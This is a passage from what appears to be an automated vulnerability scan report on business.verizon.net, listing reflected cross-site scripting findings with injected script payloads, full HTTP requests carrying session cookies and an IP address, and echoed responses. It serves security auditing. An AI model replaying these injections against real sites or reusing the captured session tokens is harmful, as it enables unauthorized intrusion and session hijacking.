Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:04:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:04:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=7nCLMnLDhjp5p09sTnn2nhGd0j1pkW1mGh9bLQ2rQs2QPTB81b2w!-1644393018; path=/
Content-Length: 80892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<script type="text/javascript">
       document.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overviewdbba0"-alert(1)-"dc444b6dd45|; path=/";
   </script>
...[SNIP]...

2.295. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [refId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the refId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8e2"><script>alert(1)</script>53728f4544 was submitted in the refId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_support&refId=c999869f8e2"><script>alert(1)</script>53728f4544&helpPagenew=dsl HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=86p1MnJp8km49dRDytK3jhJmFQQMyrtSN2RH94ZZfSHQJh4WVffk!-1644393018; path=/
Content-Length: 84564

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<input type="hidden" id="pageURL" value="http://business.verizon.net:80/SMBPortalWeb/appmanager/SMBPortal/smb%3F_nfpb=true%26_pageLabel=SMBPortal_page_main_support%26refId=c999869f8e2"><script>alert(1)</script>53728f4544%26helpPagenew=dsl"/>
...[SNIP]...

2.296. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [vdoId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the vdoId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5de81"-alert(1)-"0f422e70a49 was submitted in the vdoId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=12245de81"-alert(1)-"0f422e70a49&isVideoContent=true&portletTitle=Video HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SaasSessionID=7wwLMnKVGSC7Xw3nZxn2w3s3r1bZb5Wlh12LpQ2knK9GMLWJ6pyQ!-1644393018; path=/
Content-Length: 80661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
t.cookie = "redirect=/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_videoCenter&Channel=USA+Business&ClipId=Jpeb1609902&Format=flash&Bitrate=300&vdoId=12245de81"-alert(1)-"0f422e70a49&isVideoContent=true&portletTitle=Video|; path=/";
   </script>
...[SNIP]...

2.297. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e4094(a)9a4d4c079b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortale4094(a)9a4d4c079b1/smb/SMBPortal_portlet_news_ins_federatedMediaBlog HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 127
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:11 GMT
Connection: close
Set-Cookie: SaasSessionID=z6dhMnKbqhGqJkkLT2302NZYXzGSGN9vllydj7T1WHw3YT8X0hzM!-1644393018; path=/

Resource /SMBPortale4094(a)9a4d4c079b1/smb/SMBPortal_portlet_news_ins_federatedMediaBlog could not be resolved for locale null.

2.298. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1599c(a)04df0882705 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb1599c(a)04df0882705/SMBPortal_portlet_news_ins_federatedMediaBlog HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 127
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:11 GMT
Connection: close
Set-Cookie: SaasSessionID=Krl1MnKb3yG5Fdk1B2jLjF73XG8nbGJ62t1WmGp71kkpL8B3sYVX!-1644393018; path=/

Resource /SMBPortal/smb1599c(a)04df0882705/SMBPortal_portlet_news_ins_federatedMediaBlog could not be resolved for locale null.

2.299. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 72b48(a)70bf096520f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog72b48(a)70bf096520f HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 127
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:11 GMT
Connection: close
Set-Cookie: SaasSessionID=28rqMnKbznP0Z2T2kQc3G01XbHTfXvvLmPWp1R6T7XyYyl5GGcGc!-1644393018; path=/

Resource /SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog72b48(a)70bf096520f could not be resolved for locale null.

2.300. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6afb5(a)2fd7ccab91a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal6afb5(a)2fd7ccab91a/smb/SMBPortal_portlet_news_ins_weather HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:09 GMT
Connection: close
Set-Cookie: SaasSessionID=WgpSMnKZqv4pwvGGXtwn27LN4wpQl30qQZ0ZgFY3JbZLm0BdJ9jn!-1644393018; path=/

Resource /SMBPortal6afb5(a)2fd7ccab91a/smb/SMBPortal_portlet_news_ins_weather could not be resolved for locale null.

2.301. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ca92e(a)1f5b19f9dbb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbca92e(a)1f5b19f9dbb/SMBPortal_portlet_news_ins_weather HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:10 GMT
Connection: close
Set-Cookie: SaasSessionID=jkcmMnKhJlyZhpFWpmqhjPJyWWptczZJbG52nDHZ2L12JJLL4kGh!-1644393018; path=/

Resource /SMBPortal/smbca92e(a)1f5b19f9dbb/SMBPortal_portlet_news_ins_weather could not be resolved for locale null.

2.302. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4a0cb(a)76841a1a72b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather4a0cb(a)76841a1a72b HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 116
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:10 GMT
Connection: close
Set-Cookie: SaasSessionID=J1sXMnKhDCGPqjYXDkkmyNb33pG1Q2vpbhvVp8z7XTBhKbV1l781!-1644393018; path=/

Resource /SMBPortal/smb/SMBPortal_portlet_news_ins_weather4a0cb(a)76841a1a72b could not be resolved for locale null.

2.303. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c3009(a)cc66f89f4fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortalc3009(a)cc66f89f4fc/smb/SMBPortal_portlet_ovrvw_inst_businessNews HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 123
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:11:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:11:34 GMT
Connection: close
Set-Cookie: SaasSessionID=g118MnKW4XqJ1xrMZLQchJQvQ2vcb22H1McldvwT1r1B7nFQlhsN!-1644393018; path=/

Resource /SMBPortalc3009(a)cc66f89f4fc/smb/SMBPortal_portlet_ovrvw_inst_businessNews could not be resolved for locale null.

2.304. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
